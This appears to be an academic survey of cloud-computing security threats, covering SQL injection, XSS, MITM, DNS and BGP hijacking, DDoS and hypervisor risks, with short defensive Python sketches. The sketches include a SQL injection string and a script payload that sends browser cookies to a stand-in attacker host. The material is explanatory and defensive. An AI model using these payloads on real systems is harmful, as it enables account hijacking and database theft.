Next generation architecture




Cloud computing has been envisioned as the next-generation architecture of the IT enterprise and a new computing paradigm for users. It promises a flexible IT infrastructure, accessible through the Internet from lightweight portable devices, allowing a multi-fold increase in capacity and capabilities, and new software licensed on the fly, without additional investment, meeting the user's needs and requirements. Looked at in greater depth, however, in a cloud computing environment the IT services, along with the programs and user data, are moved to large data centres beyond the reach of the users, where the management of the data and services may not be fully trustworthy. This unique attribute poses manifold security and privacy challenges that are not yet well understood and have become a subject of discussion among present-day researchers. Since its inception into the computing world, cloud computing has undergone many challenges and has survived the various threats that blocked its way. Still, multifarious issues remain to be dealt with regarding security and privacy in a cloud computing scenario. In this article we elaborate the manifold security issues that still threaten the privacy and integrity of users in the cloud.

Keywords - Software as a Service (SaaS), Platform as a Service (PaaS), Infrastructure as a Service (IaaS), Interoperability, Denial of Service (DoS), Distributed Denial of Service (DDoS), Captcha, BGP prefix hijacking.


The computing world has evolved rapidly over the years. Starting with the advent of mainframe computers, quite bulky in size and allowing data transfer through floppy disks or magnetic disks from one system to another, there came minicomputers, which paved the way for personal computers that brought processing power to the individual's desktop with basic applications like word documents and spreadsheets. The personal computing revolution became portable with laptops, handheld devices and smart phones.

As time passed, the IT industry also progressed, and with every evolutionary step the computer's underlying architecture became more distributed. The inception of the Internet into the computing world created a major difference between the IT industry of that time and the world before its adoption. The Internet has narrowed the communication gap and provided services that can solve problems within seconds. The last few years have seen the rise of a computing aura that has led to a more distributed computing environment while also reviving the utility of centralized storage. The growth of high-speed data lines, reduced storage costs, the advent of high-speed wireless networks and the proliferation of handheld devices able to access the web have given way to the much-hyped technological era of cloud computing.

A plethora of definitions have been given for cloud computing. Cloud computing [7] [12] [16] has been defined as a new state-of-the-art technique able to provide a flexible IT infrastructure, integrating features that support high scalability and multi-tenancy, such that users need not own the infrastructure supporting these services. Moreover, cloud computing minimizes capital expenditure and is device- and location-independent, as the Internet services used to deploy a cloud computing platform can be accessed from anywhere in the world. It is viewed as the new-generation technology expected to take the IT world to new heights, where the whole world will communicate through network-based services.

Another definition says: "Cloud computing represents the integration of technology and business developments on the Internet, allowing users to use the applications and services provided and to access personal information through any system supporting Internet connectivity [17]. Cloud computing renders services to users on various service platforms such as SaaS, PaaS, IaaS, HaaS, IMPaaS etc." SaaS: Software as a Service [3] [7] [12] ensures that complete applications are hosted on the Internet and used by the customers, with payment made on a pay-per-use model. It eliminates the need to install and run the application on the customer's local computer, thus alleviating the customer's burden of software development and maintenance.

In the Platform as a Service (PaaS) approach [7] [8], the offering also includes a software execution environment, such as an application server, enabling lone developers and start-up companies to deploy web-based applications without the cost and complexity of buying servers and setting them up. Hence we can say that PaaS refers to providing a development platform, primarily to start-ups, to develop, deploy, host and maintain applications.

Infrastructure as a service (IaaS) [7] [8] refers to the sharing of hardware resources for executing services, typically using Virtualization technology. With this so-called Infrastructure as a Service (IaaS) approach, potentially multiple users use existing resources. The resources can easily be scaled up depending on the demand from user and they are typically charged for on a pay-per-use basis.

Cloud Computing distinguishes itself from other computing paradigms like: grid computing, global computing, internet computing in the various aspects of On Demand Service Provision, User Centric Interfaces, guaranteed QoS, Autonomous system [5] etc. A few state of the art techniques [7] [12] that contribute to the cloud computing are:

  • Virtualization: This has been the underlying concept behind the huge rise of cloud computing in the modern era. The term refers to providing end users with an environment able to render all the services that the hardware of a personal computer could support. The three existing forms of virtualization, categorized as server, storage and network virtualization, have inexorably led to the evolution of cloud computing.
  • Web services and SOA: Web services provide services over the web using technologies like XML, Web Services Description Language (WSDL), Simple Object Access Protocol (SOAP), and Universal Description, Discovery, and Integration (UDDI). The service organisation inside a cloud is managed in the form of a Service Oriented Architecture (SOA).
  • Application Programming Interfaces (APIs): Without APIs it is hard to imagine the existence of cloud computing. The whole range of cloud services depends on APIs, which allow deployment and configuration. Based on the API category used, viz. control, data and application APIs, different functions are controlled and services rendered to users.
  • Web 2.0 and mash-up: Web 2.0 symbolizes the trend of using world-wide web technology and web design to enhance creativity, information sharing and collaboration among users. A mash-up is a web application that combines data from more than one source into a single integrated tool.
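As a hypothetical sketch of how control APIs are typically secured (the endpoint path, key and canonical-string layout below are invented for illustration, not any particular provider's scheme), many cloud APIs authenticate each request with an HMAC signature over a canonical description of the call, which the provider recomputes before acting on it:

```python
import hashlib
import hmac

def sign_request(secret_key: str, method: str, path: str, timestamp: str) -> str:
    """Sign a cloud control-API request: HMAC-SHA256 over a canonical
    string of the call, sent alongside the request in a header."""
    canonical = f"{method}\n{path}\n{timestamp}"  # layout is illustrative
    return hmac.new(secret_key.encode(), canonical.encode(),
                    hashlib.sha256).hexdigest()

# The client attaches the signature; the provider, holding the same
# secret, recomputes it to authenticate the caller before e.g.
# starting or stopping a virtual machine.
sig = sign_request("demo-secret", "GET", "/v1/instances", "2024-01-01T00:00:00Z")
print(len(sig))  # 64 hex characters
```

Because the signature covers the method, path and timestamp, a captured request cannot be replayed against a different resource without invalidating it.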

These are a few of the technological advances that led to the emergence of cloud computing and enabled many service providers to offer customers a hassle-free world of virtualization fulfilling all their demands. The prominent ones are Amazon, with EC2 (Elastic Compute Cloud), S3 (Simple Storage Service), SQS (Simple Queue Service), CF (CloudFront) and SimpleDB; Google; Microsoft; ProofPoint; RightScale; Workday; Sun Microsystems etc., and each of them is categorised under one of the three main classifications based on the cloud structure they provide: private, public and hybrid cloud. Each of the above-mentioned cloud structures has its own limitations and benefits [7].

The enormous growth in this field has changed the way the computing world is looked at; the IT sector has witnessed a change in the way situations are handled, marking the reversal of a long-standing trend and begetting a new technological era. Still, some issues are the same as ever, yet more compelling now. With the avalanche-like rise in the deployment of cloud computing, the perennial security and privacy issues have become more sophisticated and more distributed, in the sense that the user base for such services is growing by leaps and bounds. In order to maintain security and privacy in areas such as confidentiality, operational integrity, disaster recovery and identity management, at least the following schemes [15] should be in place to ensure data security to some extent:

  • An encryption scheme to ensure data security in a highly interfering environment maintaining security standards against popular threats and data storage security.
  • Stringent access controls to prevent unauthorized and illegal access to the servers controlling the network.
  • Data backup and redundant data storage to make data retrieval easy on any type of loss.
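As a minimal sketch of the third point (the record contents and replica layout are invented for illustration), redundant replicas can be cross-checked cheaply by comparing cryptographic digests instead of shipping the full data between data centres:

```python
import hashlib

def digest(data: bytes) -> str:
    """SHA-256 fingerprint of one stored replica."""
    return hashlib.sha256(data).hexdigest()

def replicas_consistent(replicas) -> bool:
    """True if every replica holds byte-identical content; a corrupted
    or stale copy shows up as a second distinct digest."""
    return len({digest(r) for r in replicas}) == 1

record = b"customer record v7"
print(replicas_consistent([record, record, b"customer record v7"]))  # True
print(replicas_consistent([record, record, b"customer record v6"]))  # False
```

A replica that fails the check can then be rebuilt from the copies that still agree, which is the point of keeping the storage redundant.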

From the perspective of data security, which has always been an important aspect of cloud computing, the cloud gives rise to a number of security threats for the following reasons. Firstly, traditional techniques cannot be adopted, as they have become quite obsolete with respect to ever-evolving security threats and to avoiding data loss in a cloud computing environment. Secondly, data stored in the cloud is not merely stored: it is accessed a large number of times, and changes in the form of insertions and deletions take place from time to time.

This paper is aimed at developing an understanding of the manifold security threats that do hamper the security and privacy of a user.


Although the hype surrounding cloud computing is at its peak, there are certain aspects that cannot be ignored and that limit the technical heights which can be achieved. Regardless of the cumulus aura surrounding the topic, we had better not ignore the loopholes in its architecture that have made it vulnerable to various security and privacy threats. A few issues limiting the boundaries of this transformational concept are:


The fundamental factor defining the success of any new computing technology is how secure it is. Is the data residing in the cloud secure enough to avoid any sort of security breach, or is it more secure to store the data away from the cloud, on our own personal computers or hard drives? At least we can access our hard drives and systems whenever we wish to, whereas cloud servers could potentially reside anywhere in the world and we need Internet connectivity to log in and access the data on them. The cloud service providers insist that their servers, and the data stored on them, are sufficiently protected from any sort of invasion and theft. Such companies argue that the data on their servers is inherently more secure than data residing on a myriad of personal computers and laptops, but they also admit that our data will be distributed over these individual computers regardless of where the base repository of data is ultimately stored. There have been instances when their security has been invaded and the whole system has been down for hours. At least half a dozen security breaches occurred last year, bringing out fundamental lapses in the security models of major CSPs. Information requiring privacy, and the various privacy challenges, need specific steps to be taken in order to ensure privacy in the cloud, as discussed in [4] [8].


Latency [8] has always been an issue in cloud computing (however minimal), with data expected to flow around different clouds. Other factors that add to latency are the encryption and decryption of data as it moves around unreliable and public networks. Moreover, the performance of the system should also be taken into account. Sometimes the cloud service providers run short of capacity, either by allowing access to too many virtual machines or by overloading their Internet links under high demand from customers. This hurts system performance and adds to the latency of the system.


There are cases when companies cannot move their data and applications if they find another cloud platform they like better than the one they are using. Also, some companies use different cloud platforms for different applications, based on their requirements and the services provided by the cloud service providers (CSPs). In some cases different cloud platforms are used for a particular application, or different cloud platforms have to interact with each other regarding a particular task; for that, interoperability between the different cloud platforms and the company's internal infrastructure is needed to maintain a balance, as discussed in [2].

Thus we see that although the buzz of cloud computing prevails everywhere because of the multi-fold features and facilities it provides, there are still issues that need to be solved in order to reach the landmarks it has set and to give a better-functioning IT world access to hardware and application resources.


The chief concern in cloud environments is security around multi-tenancy and isolation; giving customers more assurance than a simple "trust us" has to be a good thing. Security at different levels, such as the network level, host level and application level, is necessary to keep the cloud up and running continuously. In accordance with these different levels there exist different types of threats and numerous security concerns, as discussed below:


Web 2.0, a key technology enabling the use of Software as a Service (SaaS) and freeing users from the tasks of maintenance and software installation, has been used widely all around. As the user base making use of it increases by leaps and bounds, security has become more important than ever in such an environment. SQL injection attacks are those in which malicious code is inserted into a standard SQL query; the attackers thereby gain unauthorized access to a database and become able to access sensitive information. Sometimes the hacker's input is mistaken by the website for user data and passed to the SQL server, which lets the attacker learn the functioning of the website and make changes to it. Various techniques, such as avoiding the use of dynamically generated SQL in the code and using filtering techniques to sanitize user input, are employed to check SQL injection attacks.
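The contrast between dynamically generated SQL and a sanitized alternative can be sketched as follows (the table and injection payload are invented for illustration; parameter binding is the standard filtering-free defence):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

user_input = "' OR '1'='1"  # classic injection payload

# Vulnerable: string concatenation lets the payload rewrite the query,
# turning the WHERE clause into a tautology that matches every row.
vulnerable = conn.execute(
    f"SELECT secret FROM users WHERE name = '{user_input}'"
).fetchall()

# Safe: a bound parameter is treated strictly as data, never as SQL.
safe = conn.execute(
    "SELECT secret FROM users WHERE name = ?", (user_input,)
).fetchall()

print(len(vulnerable), len(safe))  # 1 0
```

The dynamically built query leaks the stored secret, while the parameterized one correctly returns no rows for the bogus name.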

Cross Site Scripting (XSS) attacks [21], which inject malicious scripts into web content, have become quite popular since the inception of Web 2.0. Based on the type of services provided, a website can be classified as static or dynamic. Static websites do not suffer from the security threats that dynamic websites do, which stem from the dynamic nature of the latter in providing multi-fold services to users.

As a result, these dynamic websites fall victim to XSS attacks. It has been observed quite often that, while working on the net or surfing, web pages or pop-ups open with a request to be clicked in order to view the content they contain. More often than not, either unknowingly (of the possible hazards) or out of curiosity, users click on these hazardous links, and the intruding third party gains control over the user's private information or hacks their accounts using the information made available. Various techniques such as active content filtering, content-based data leakage prevention technology and web application vulnerability detection technology have already been proposed [10]. These technologies adopt various methodologies to detect security flaws and try to fix them.
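Active content filtering in its simplest form means escaping user-supplied text before rendering it, so the browser displays markup instead of executing it. A minimal sketch (the comment payload is invented for illustration):

```python
import html

# A script a malicious user might submit as a "comment" to steal cookies.
payload = '<script>location="http://evil.example/?c="+document.cookie</script>'

# Vulnerable: the raw input is interpolated into the page and would
# execute in every visitor's browser.
unsafe_page = f"<p>Comment: {payload}</p>"

# Filtered: html.escape turns <, >, & and quotes into entities, so the
# payload is shown as inert text rather than run as a script.
safe_page = f"<p>Comment: {html.escape(payload)}</p>"

print("<script>" in unsafe_page, "<script>" in safe_page)  # True False
```

Real frameworks apply this escaping automatically in their template engines; the principle of never emitting raw user input is the same.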

Another type of attack, quite common against SaaS, is the man-in-the-middle (MITM) attack. In such an attack [22] an intruder inserts himself into an ongoing conversation between a server and a client in order to inject false information and to gain knowledge of the important data transferred between them. Tools such as Dsniff, Cain, Ettercap, Wsniff and Airjack are well known for mounting such attacks, and strong encryption technologies have been developed to safeguard against them. A detailed study of preventing man-in-the-middle attacks has been presented in [9].
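On the client side, the practical defence against MITM is a TLS connection that actually verifies the server's certificate and hostname; disabling either check is what re-opens the interception window. A minimal sketch using Python's standard library:

```python
import ssl

# A client-side TLS context with full verification: the peer must
# present a certificate chaining to a trusted CA, and its hostname
# must match the one we intended to contact. An intercepting proxy
# without a valid certificate causes the handshake to fail.
ctx = ssl.create_default_context()

print(ctx.verify_mode == ssl.CERT_REQUIRED)  # True
print(ctx.check_hostname)                    # True

# The context would then wrap a socket, e.g.:
#   with socket.create_connection((host, 443)) as sock:
#       with ctx.wrap_socket(sock, server_hostname=host) as tls:
#           ...
# (connection code omitted here to keep the sketch offline).
```

The commented-out connection shows where the context is applied; the key point is that `create_default_context` enables both checks by default, and they should not be switched off.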

A few important points, such as evaluating software-as-a-service security, separating endpoint and server security processes, and evaluating virtualization at the endpoint, have been mentioned by Eric Ogren in a recent article on how whitelists and SaaS modify traditional security and tackle flaws [11].

Hence security at different levels is necessary in order to ensure proper implementation of cloud computing such as: server access security, internet access security, database access security, data privacy security and program access security. In addition we need to ensure data security at network layer, data security at physical and application layer to maintain a secure cloud.


Networks are classified into many types, such as shared and non-shared, public or private, and small-area or large-area networks, and each of them has a number of security threats to deal with. To ensure network security, points such as confidentiality and integrity in the network, proper access control, and security against external third-party threats should be considered when providing network-level security.

Problems associated with network-level security [7] include DNS attacks, the issue of reused IP addresses, Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks, etc.


A Domain Name System (DNS) server performs the translation of a domain name to an IP address; since domain names are much easier to remember, the DNS server is needed. But there are cases when, having called the server by name, the user has been routed to some other, evil cloud instead of the one asked for, while using raw IP addresses is not always feasible either. Although DNS security measures such as the Domain Name System Security Extensions (DNSSEC) reduce the effects of DNS threats, there are still cases where these measures prove ineffective, as when the path between a sender and a receiver gets rerouted through some evil connection. It may happen that even with all DNS security measures taken, the route selected between sender and receiver causes security problems. Such a case has already been discussed in [6].


Each system on a network is assigned an IP address, and IP addresses are basically a finite resource. Last year many cases came to light relating to the reused IP address issue. When a particular user moves out of a network, the IP address formerly associated with him is assigned to a new user. This sometimes puts the security of the new user at risk, as there is a certain time lag between the change of an IP address in DNS and the clearing of that address from DNS caches. Hence, even though the old IP address has been assigned to a new user, the chance of the data being accessed by some other user is not negligible: the address still exists in the DNS cache, and data belonging to one user may become accessible to another, compromising the privacy of the original user.


Prefix hijacking is a type of network attack in which a wrong announcement of the IP addresses associated with an Autonomous System (AS) is made, allowing malicious parties to gain access to untraceable IP addresses. On the Internet, IP space is allocated in blocks and remains under the control of ASes. An autonomous system can broadcast information about the IPs in its regime to all its neighbours.

These ASes communicate with each other using the Border Gateway Protocol (BGP). Sometimes, due to some error, a faulty AS broadcasts wrongly about the IPs associated with it; in such a case, traffic that should be routed to the IP in question gets routed elsewhere, and hence data gets leaked or reaches a destination it should not.


Application level security [7] refers to the usage of software and hardware resources to provide security to applications such that the attackers are not able to get control over these applications and make desirable changes to their format. The threats to application level security include XSS attacks, SQL injection attacks, DoS attacks, CAPTCHA Breaking etc resulting from the unauthorized usage of the applications.


A DoS attack is an attempt to make the services assigned to the authorized users unavailable to them. In such an attack the server providing the service is flooded with a large number of requests, and hence the service becomes unavailable to the authorized user. Sometimes, when we try to access a site, we find that because the server is overloaded with access requests we are unable to reach it and observe an error. This happens when the number of requests exceeds the capacity the server can handle [18].
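One common server-side mitigation for request flooding is per-client rate limiting, for example with a token bucket: each client may burst up to a small allowance, after which excess requests are rejected instead of queuing until the server drowns. A minimal sketch (the rate and capacity values are illustrative):

```python
import time

class TokenBucket:
    """Per-client rate limiter: tokens refill at a fixed rate, each
    served request spends one token, and requests arriving with the
    bucket empty are rejected rather than queued."""

    def __init__(self, rate: float, capacity: int):
        self.rate = rate              # tokens added per second
        self.capacity = capacity      # maximum burst size
        self.tokens = float(capacity)
        self.last = time.monotonic()

    def allow(self) -> bool:
        now = time.monotonic()
        self.tokens = min(self.capacity,
                          self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False

# A flood of 100 back-to-back requests from one client: only roughly
# the burst allowance gets through; the rest are shed cheaply.
bucket = TokenBucket(rate=10, capacity=5)
results = [bucket.allow() for _ in range(100)]
print(results.count(True))
```

Shedding excess load this early keeps the expensive application logic reachable for clients that stay within their allowance.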


DDoS [18] may be called an advanced version of DoS in terms of denying the important services running on a server, flooding the destination server with so many packets that the target server cannot handle them. Unlike DoS, in DDoS the attack is relayed from different dynamic networks that have already been compromised.

The DDoS attack is run by three functional units: a master, slaves and a victim. The master, as the attack launcher, is behind the attack; the slaves are the networks that act as a launch pad, providing the platform for the master to launch the attack on the victim. Hence it is also called a coordinated attack.

Basically, a DDoS attack operates in two stages: the first is the intrusion phase, where the master compromises less important machines to support the flooding of the more important target; the next is installing DDoS tools and attacking the victim server or machine.

Hence a DDoS attack results in making the service unavailable to the authorized user similar to the way it is done in a DoS attack but different in the way it is launched.


CAPTCHAs were developed in order to prevent the usage of Internet resources by bots or computers. They are used to prevent spam and the overexploitation of network resources by bots. Even multiple website registrations, dictionary attacks etc. by an automated program are prevented using a CAPTCHA.

But recently it has been found that spammers are able to break the CAPTCHAs [14] provided by the Hotmail and Gmail service providers. They make use of the audio system that reads out the CAPTCHA characters for visually impaired users, and apply speech-to-text conversion software to defeat the test. In yet another instance of CAPTCHA breaking, it was found that net users are offered some form of incentive by automated systems to solve these CAPTCHAs, and thus CAPTCHA breaking takes place.


Google has emerged as the best option for finding details about anything on the net. Google hacking refers to using Google to find sensitive information that a hacker can use to his benefit while hacking a user's account. Generally, hackers try to find security loopholes by probing Google for information about the system they wish to hack, and then, having gathered the necessary information, they carry out the hacking of the concerned system. In some cases a hacker is not sure of the target; instead, he Googles for targets based on the loophole he wishes to exploit, searching out all possible systems having that loophole.


Cloud computing rests mainly on the concept of virtualization. In a virtualized world, the hypervisor is defined as a controller, popularly known as the virtual machine manager (VMM), that allows multiple operating systems to run on a system at a time, providing resources to each operating system such that they do not interfere with each other.

As the number of operating systems running on a hardware unit increases, the security issues concerning those new operating systems also need to be considered. Because multiple systems operate on a single machine, it is not possible to keep track of them all, and hence keeping all the operating systems secure is a tough job. It may happen that a guest system tries to run malicious code on the host system, bringing the system down or taking full control of it and blocking access to the other guest operating systems [13].

The security with respect to hypervisor is of great concern as all the guest systems are controlled by it. If a hacker is able to get control over the hypervisor he can make changes to any of the guest operating systems and gets control over all the data passing through the hypervisor.


Many cloud service providers offer storage as a form of service. They take data from the users and store it in large data centres, hence providing users with a means of storage. Although these cloud service providers claim that the data stored in their clouds is utterly safe, there have been cases where data stored in these clouds has been modified or lost, whether due to a security breach or human error.

Various cloud service providers adopt different technologies to safeguard the data stored in their clouds. But the question is: is the data stored in these clouds secure enough against any sort of security breach? These service providers use encryption techniques such as public key and private key encryption to secure the data resting in the cloud. A technique providing data storage security, utilizing a homomorphic token with distributed verification of erasure-coded data, has been discussed in [1].
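The idea behind such storage-auditing schemes can be illustrated with a toy challenge-response check (this is a deliberately simplified sketch, not the homomorphic-token construction of [1]: here the key is shared with the verifier for brevity, whereas real schemes precompute tokens so the server never learns them). The user sends a fresh random nonce; the server can only produce the correct response if it still holds the intact data:

```python
import hashlib
import hmac
import secrets

key = secrets.token_bytes(32)                      # held by the data owner
data = b"archived block stored with the provider"  # held by the server

def server_response(stored: bytes, nonce: bytes) -> bytes:
    """What an honest server computes over the data it actually holds."""
    return hmac.new(key, nonce + stored, hashlib.sha256).digest()

# Audit round: a fresh nonce defeats replay of old answers, and any
# corruption of the stored block changes the expected MAC.
nonce = secrets.token_bytes(16)
expected = hmac.new(key, nonce + data, hashlib.sha256).digest()

print(hmac.compare_digest(server_response(data, nonce), expected))       # True
print(hmac.compare_digest(server_response(data[:-1], nonce), expected))  # False
```

Because each audit uses a new nonce, a server that has silently lost or altered the data cannot pass by caching an earlier correct answer.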

An incident relating to data loss occurred last year with the online storage service provider MediaMax, also known as The Linkup, when active customer data was deleted due to a system administration error. Hence it must be ensured that redundant copies of user data are stored in order to handle any sort of adverse condition leading to data loss.


In order to secure the cloud against the various security threats and attacks, such as SQL injection, Cross Site Scripting (XSS) attacks, DoS and DDoS attacks, Google hacking and forced hacking, different cloud service providers adopt different techniques. A few standard techniques for countering the above-mentioned attacks are: avoiding the use of dynamically generated SQL in code, finding the meta-structures used in the code, validating all user-entered parameters, and disallowing unwanted data and characters and then removing them.

A Google hacking database identifies various types of information, such as login passwords, pages containing logon portals, and session usage information. Software modules such as a web vulnerability scanner can be used to detect the possibility of a Google hack. In order to prevent Google hacking, the user needs to ensure that only information that cannot harm him is shared with Google, preventing the sharing of any sensitive information that may result in adverse conditions.

The symptoms of a DoS or DDoS attack are: system speed is reduced and programs run very slowly; a large number of connection requests arrive from a large number of users; and few resources remain available. Although DDoS attacks launched in full strength are very harmful, as they exhaust all the network resources, careful monitoring of the network can help keep these attacks in check.

In IP spoofing an attacker tries to convince users that packets are coming from reliable sources; the attacker thus takes control of the client's data or system by posing as the trusted party. Spoofing attacks can be checked by using encryption techniques and performing user authentication based on key exchange. Techniques like IPsec do help in mitigating the risks of spoofing. By enabling encrypted sessions and performing filtering at the incoming and outgoing gateways, spoofing attacks can be reduced.

Moreover we need to ensure that security against the virtual threats should also be maintained by adopting the following methodologies such as: keeping in check the virtual machines connected to the host system and constantly monitoring their activity, securing the host computers to avoid tampering or file modification when the virtual machines are offline, preventing attacks directed towards taking control of the host system or other virtual machines on the network etc.

The security breach at Twitter [20] and the web-host hack via a zero-day vulnerability [19] last year have made clear that stringent security measures need to be taken in order to ensure security and proper data control in the cloud.

Thus we see that the security model adopted by a Cloud service provider should safeguard the cloud against all the possible threats and ensure that the data residing in the cloud doesn't get lost due to some unauthorized control over the network by some third party intruder.


Cloud computing has become quite popular and is currently seen as the face of the IT industry in the coming days. Although it has revolutionized the computing world, it is prone to manifold security threats, varying from network-level threats to application-level threats. In order to keep the cloud secure, these security threats need to be controlled. Moreover, data residing in the cloud is also prone to a number of threats, and issues such as the confidentiality and integrity of data should be considered when buying storage services from a cloud service provider. Proper auditing of the cloud also needs to be done to safeguard it against external threats. In this paper, various security concerns related to the three basic services provided by a cloud computing environment have been considered, and solutions to prevent them have been discussed.


  1. Cong Wang, Qian Wang, Kui Ren, and Wenjing Lou, "Ensuring Data Storage Security in Cloud Computing," 17th International workshop on Quality of Service, IWQoS, pp. 1-9, July 2009.
  2. Marios D. Dikaiakos, Dimitrios Katsaros, Pankaj Mehra, George Pallis, Athena Vakali, "Cloud Computing: Distributed Internet Computing for IT and Scientific Research," IEEE Internet Computing, pp. 10-13, September 2009
  3. R. Maggiani, Communication Consultant, Solari Communication, "Cloud Computing is Changing How we Communicate," IEEE International Professional Conference, IPCC, pp. 1-4, 2009.
  4. S. Pearson, "Taking account of privacy when designing cloud computing services," ICSE Workshop on Software Engineering Challenges of Cloud Computing, pp. 44-52, May 2009.
  5. Lizhe Wang, Jie Tao, Kunze M., Castellanos A.C., Kramer D., Karl W., "Scientific Cloud Computing: Early Definition and Experience," 10th IEEE Int. Conference on High Performance Computing and Communications, pp. 825-830, Sept. 2008.
  6. Char Sample, Senior Scientist, BBN Technologies, and Diana Kelley, Partner, Security Curve, "Cloud computing security: Routing and DNS security threats."
  7. Tim Mather, Subra Kumaraswamy, Shahed Latif, "Cloud Security and Privacy: An Enterprise Perspective in Risk and Compliance," Published by O Reilly Media, September 2009.
  8. Neal Levitt, "Is Cloud Computing Really Ready for Prime Time?" pp. 15-20, January 2009.
  9. Jonathan Katz, "Efficient Cryptographic Protocols Preventing Man In The Middle Attacks," Thesis Submission at Columbia University
  10. Web 2.0/SaaS Security
  11. Eric Ogren, "Whitelists, SaaS modify traditional security, tackle flaws."
  12. Hakan Erdogmus, "Cloud Computing: Does Nirvana Hide behind the Nebula?," IEEE Computer Society in IEEE Software, pp. 4-6, March 2009.
  13. Daniel Petri, "What You Need to Know About Securing Your Virtual Network,"
  14. John E. Dunn, "Spammers break Hotmail's CAPTCHA yet again", Tech-world, published on 16th Feb. 2009.
  15. Lori M. Kaufman, "Data security in the world of cloud computing," IEEE Security and Privacy, pp. 61-64, July 2009.
  16. Cloud Computing, Wikipedia.
  17. Geng Lin, David Fu, Jinzy Zhu, Glenn Dasmalchi, "Cloud Computing: IT as a Service," Published by IEEE Computer Society in IT Professional, pp. 10-13, March 2009.
  18. Argyris Argyrou, "Denial of Service Attacks," Information Systems Audit and Controls, project paper, May 2004.
  19. Dan Goodin, "Webhost hack wipes out data for 100,000 sites," posted 8th June 2009.
  20. Josh Lowensohn, Caroline McCarthy, "Lessons from Twitter's security breach," Cnet News, July 2009.
  21. Steven Cook, "A Web Developer's Guide to Cross Site Scripting Attacks," SANS, Jan. 2003.
  22. Bruce Schneier, "Man in the Middle Attacks," 15th July 2008,